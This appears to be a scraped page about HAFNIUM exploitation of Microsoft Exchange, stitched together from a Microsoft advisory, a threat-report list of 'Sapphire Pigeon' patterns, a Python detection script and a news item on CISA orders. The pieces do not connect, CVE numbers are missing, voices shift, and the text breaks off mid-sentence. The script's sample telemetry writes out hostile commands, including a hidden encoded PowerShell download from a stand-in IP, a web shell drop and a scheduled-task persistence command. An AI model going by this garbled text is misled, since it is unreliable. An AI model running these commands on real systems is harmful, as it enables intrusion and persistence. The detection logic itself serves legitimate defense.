Virus on exchange server

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control.

Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems. CVE is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program.

This requires administrator permission or another vulnerability to exploit. CVE is a post-authentication arbitrary file write vulnerability in Exchange. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users. Our blog, Defending Exchange servers under attack, offers advice for improving defenses against Exchange server compromise.

Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise. The below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft Defender.

We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems. The Microsoft Exchange Server team has published a blog post on these new Security Updates providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.

InternalUrl and ExternalUrl should only be valid URIs. Microsoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. However, we realize not all organizations have the expertise or resources to do this, so the above steps are a starting point for remediation if you cannot perform further investigation and response.


Sapphire Pigeon exhibited the following unique patterns, which we tweeted about on the afternoon of March 5:

- Use of encoded PowerShell to connect to a remote host
- Creation of a scheduled task named Winnet
- IIS worker process spawning cmd
- IIS worker process writing

Check out the detection opportunities section below. The following image shows Sapphire Pigeon activity, but this analytic is useful beyond detecting just that cluster: [Image: Sapphire Pigeon activity]

Additional post-exploitation detection opportunities: While we wanted to focus detection opportunities on what we have observed recently, there are a wealth of other opportunities to detect any follow-on post-exploitation activity that might occur after these web shells are dropped.
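The four Sapphire Pigeon patterns above are all expressible as simple rules over endpoint telemetry. The following is an added example written for this page, not Red Canary's or Microsoft's detection code: it runs those rules over a handful of constructed process-creation and file-write events. The event field names (type, image, parent_image, cmdline, path), the w3wp.exe process name used to stand for the IIS worker process, the assumption that "IIS worker process writing" means a file write on disk, and the sample events themselves (including the documentation-range IP address) are assumptions made for the example. Encoded PowerShell is decoded as base64 of UTF-16LE text, which is what the -EncodedCommand argument expects, so the analyst can see which remote host the command reaches for.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Names below are assumptions for this example, not any product's schema.
IIS_WORKER = "w3wp.exe"  # IIS worker process hosting Exchange's web front end
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# URLs and bare IPv4 addresses inside a decoded script
HOST_PATTERN = re.compile(r"https?://[\w.\-]+(?::\d+)?|\b(?:\d{1,3}\.){3}\d{1,3}\b")
# schtasks creating a task whose name is Winnet
SCHTASK_CREATE = re.compile(r"/create\b.*?/tn\s+\"?winnet\"?", re.IGNORECASE | re.DOTALL)

Finding = Tuple[str, str]  # (rule name, detail)


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext script if cmdline carries an -enc style argument.

    PowerShell expects the blob to be base64 of UTF-16LE text; anything that
    does not decode that way is treated as not encoded."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events: List[Dict[str, str]]) -> List[Finding]:
    """Apply the four Sapphire Pigeon analytics to a list of telemetry events."""
    findings: List[Finding] = []
    for ev in events:
        image = ev.get("image", "").lower()
        if ev["type"] == "process":
            parent = ev.get("parent_image", "").lower()
            cmd = ev.get("cmdline", "")
            # IIS worker process spawning a shell
            if parent == IIS_WORKER and image in SHELLS:
                findings.append(("iis_worker_spawned_shell", cmd))
            # Encoded PowerShell: decode and report the hosts it refers to
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                hosts = ", ".join(HOST_PATTERN.findall(decoded)) or "<no host found>"
                findings.append(("encoded_powershell", hosts))
            # Scheduled task named Winnet
            if image == "schtasks.exe" and SCHTASK_CREATE.search(cmd):
                findings.append(("scheduled_task_winnet", cmd))
        elif ev["type"] == "file_write" and image == IIS_WORKER:
            # IIS worker process writing to disk (web shell drop candidate)
            findings.append(("iis_worker_wrote_file", ev["path"]))
    return findings


# Constructed sample telemetry; 198.51.100.7 is a documentation-range address.
SCRIPT = "Invoke-WebRequest -Uri http://198.51.100.7/update.txt"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # normal worker process start: no finding
    {"type": "process", "parent_image": "svchost.exe", "image": "w3wp.exe",
     "cmdline": "w3wp.exe -ap SamplePool"},
    {"type": "file_write", "image": "w3wp.exe",
     "path": r"C:\inetpub\wwwroot\aspnet_client\sample.aspx"},
    {"type": "process", "parent_image": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "parent_image": "cmd.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"type": "process", "parent_image": "cmd.exe", "image": "schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Winnet /tr C:\Windows\Temp\sample.bat /sc minute"},
    # benign admin PowerShell: -ExecutionPolicy must not be mistaken for -e
    {"type": "process", "parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def run_sample() -> List[Finding]:
    """Run the analytics over the constructed events; four findings expected."""
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for name, detail in run_sample():
        print(f"{name}: {detail}")
```

The decoder deliberately ignores blobs that are not valid base64 or not valid UTF-16LE, so a script that merely contains a long token is not flagged, and the -ExecutionPolicy event shows why the encoded-command regex must require whitespace after the switch rather than matching any argument starting with "-e".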

Looking for signs of compromise: If your Exchange server was unpatched and exposed to the internet, you should assume compromise.


The move follows the discovery of software flaws in on-premises versions of Microsoft Exchange Server being exploited by attackers. Exploitation of these vulnerabilities allows an attacker to access on-premises Exchange servers, enabling them to gain persistent system access and control of an enterprise network.

The new CISA orders are aimed at ensuring agencies use newly developed Microsoft tools to identify any compromises that remain undetected. They need to be followed even if all steps in the earlier directive were completed. "CISA also identified Microsoft Exchange servers still in operation and hosted by or on behalf of federal agencies that require additional hardening," CISA says in the supplement.

The Microsoft scanner can use up a lot of a server's processing capacity, so CISA recommends running the scan during off-peak hours. The other tool agencies are instructed to run is the Test-ProxyLogon script. The script can be run as administrator to check Exchange and IIS logs to discover signs of attacker activity, such as files written to the server and the presence of web shell scripts used for persistence.

CISA also issued hardening instructions for Exchange servers, including applying software updates, ensuring that only a supported version of Exchange is being used, and reviewing permissions and roles. The hardening requirements need to be complete by Monday, June 28. Agencies need to "enumerate accounts and groups that are leveraged by Exchange installations and review their permissions and roles. They will also need to review membership in highly privileged groups such as Administrators, Remote Desktop Users, and Enterprise Admins" and "review sensitive roles such as Mailbox Import Export and Organization Management e.
